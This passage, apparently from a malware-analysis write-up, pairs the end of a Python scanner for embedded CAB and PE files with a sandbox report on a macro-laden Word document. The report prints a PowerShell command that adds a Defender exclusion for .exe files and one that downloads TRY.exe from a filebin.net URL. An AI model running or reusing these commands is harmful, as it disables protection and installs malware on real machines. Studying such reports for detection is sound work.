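        offsets.append(i)
        start = i + 1
    return offsets


def scan(blob, rules=RULES):
    """{rule: ['0x<off>:$id: <string>', ...]} for rules whose every string occurs in blob."""
    report = {}
    for name, strings in rules:
        lines = []
        for ident, needle in strings:
            offsets = find_all(blob, needle)
            if not offsets:
                break  # one string absent: rule does not fire (assumed condition)
            lines += [f"0x{o:x}:{ident}: {needle.decode('latin-1')}" for o in offsets]
        else:
            report[name] = lines
    return report


def find_embedded_containers(blob):
    """(offset, kind) for cabinet headers and MZ headers whose e_lfanew lands on 'PE\\0\\0'."""
    found = [(o, "cab") for o in find_all(blob, b"MSCF")]
    for o in find_all(blob, b"MZ"):
        if o + 0x40 > len(blob):
            continue  # too short to hold a DOS header
        e_lfanew = struct.unpack_from("<I", blob, o + 0x3c)[0]
        if blob[o + e_lfanew : o + e_lfanew + 4] == b"PE\x00\x00":
            found.append((o, "pe"))  # bare 'MZ' alone is not enough; the PE signature must line up
    return sorted(found)


if __name__ == "__main__":
    for rule, lines in scan(DOC_BLOB).items():
        print(rule, *lines, sep="\n  ")
    print(find_embedded_containers(MSI_STREAM))
```

The e_lfanew check is what separates "MZ signature found" from a real embedded executable: the two bytes MZ occur in base64 and in random data, but an MZ followed 0x3C bytes later by a pointer that lands on PE\0\0 almost never does by accident. Against real files the same logic belongs behind olevba or yara, which walk the compound-file streams instead of the raw bytes; here the rules run over the raw blob so the offsets line up with the report's own output.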
Source: C:\Windows\System32\msiexec.exe. File deleted: C:\Windows\Installer\535fae.ipi
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB629E4 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
Source: C:\Windows\System32\msiexec.exe. File created: C:\Windows\Installer\MSI5B5A.tmp
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB665B0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB63E4C
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB61C38
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB65940
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB66028
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB633C0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB61B44
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe. Code function: 9_2_000000013FB62B24
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc. OLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentation. OLE, VBA macro: Module ThisDocument, Function AutoOpen, Name: AutoOpen
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr. OLE, VBA macro line: Sub AutoOpen()
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr. Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 289 bytes, 1 file
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr. OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr. OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: MSI5B5A.tmp.2.dr. OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 535fae.ipi.2.dr. OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr. Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (three RT_ICON resources)
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc. OLE indicator, VBA macros: true
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr. OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\icacls.exe. Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe. Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exe. Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\expand.exe. Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe. Memory allocated: 77620000 page execute and read and write
Source: C:\Windows\SysWOW64\icacls.exe. Memory allocated: 77740000 page execute and read and write
Source: C:\Windows\System32\msiexec.exe. Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\icacls.exe (2 captures), C:\Windows\System32\cmd.exe (1 capture), C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (19 captures). Console Write: raw console-buffer dumps omitted. The only readable fragments, both in the powershell.exe output, are "At line:1 char:17" and "CommandNotFoundException": column 17 is one past the sixteen-character cmdlet name Set-MpPreference, so the Defender-exclusion one-liner most likely failed to resolve on this Windows 7 analysis VM.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................ok......L.............................}.dw....`.t.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................ok......L.............................}.dw......t.....0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............6.ok......t.............................}.dw....8.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8...............}.dw....H.t.....0...............h.L.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ok......L.............................}.dw....H.t.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......T.R.Y...e.x.e.....L.............................}.dw....0.t.....0...............h.L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............6.ok......t.............................}.dw....h.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ok......L.............................}.dw....0.t.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............6.ok......t.............................}.dw....h.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.......t.....0...............h.L.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............6.ok....P.t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................ok......L.............................}.dw......t.....0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw....H.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........ok......L.............................}.dw......t.....0...............h.L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Process created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,9_2_000000013FB61B44
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc | OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR582D.tmp
Source: classification engine | Classification label: mal76.expl.winDOC@19/23@5/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB665B0 GetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,9_2_000000013FB665B0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB64478 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,GetLastError,FormatMessageA,9_2_000000013FB64478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB65940 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,9_2_000000013FB65940
Source: C:\Windows\SysWOW64\msiexec.exe | File written: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.ini
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc | OLE document summary: title field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc | OLE document summary: author field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.doc | OLE document summary: edited time not present or 0
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr | OLE document summary: title field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr | OLE document summary: author field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.dr | OLE document summary: edited time not present or 0
Source: MSI5B5A.tmp.2.dr | OLE document summary: edited time not present or 0
Source: 535fae.ipi.2.dr | OLE document summary: title field not present or empty
Source: 535fae.ipi.2.dr | OLE document summary: author field not present or empty
Source: 535fae.ipi.2.dr | OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: MSI5B5A.tmp.2.dr | Initial sample: OLE summary template = Intel;1033
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: MSI5B5A.tmp.2.dr | Initial sample: OLE summary keywords = Installer
Source: MSI5B5A.tmp.2.dr | Initial sample: OLE summary subject = Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,9_2_000000013FB61C38
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI9F1.tmp
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmp
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB615F8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,9_2_000000013FB615F8
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Windows\Logs\DPX\setupact.log
Source: C:\Windows\SysWOW64\expand.exe | File created: C:\Windows\Logs\DPX\setuperr.log
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Windows\System32\msiexec.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\msiexec.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exe TID: 2416 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 1424 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 2476 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1684 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2532 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Check user administrative privileges: GetTokenInformation
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB65E4C GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,GetLastError
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB61F00 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB67F40 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe | Code function: 9_2_000000013FB67C44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
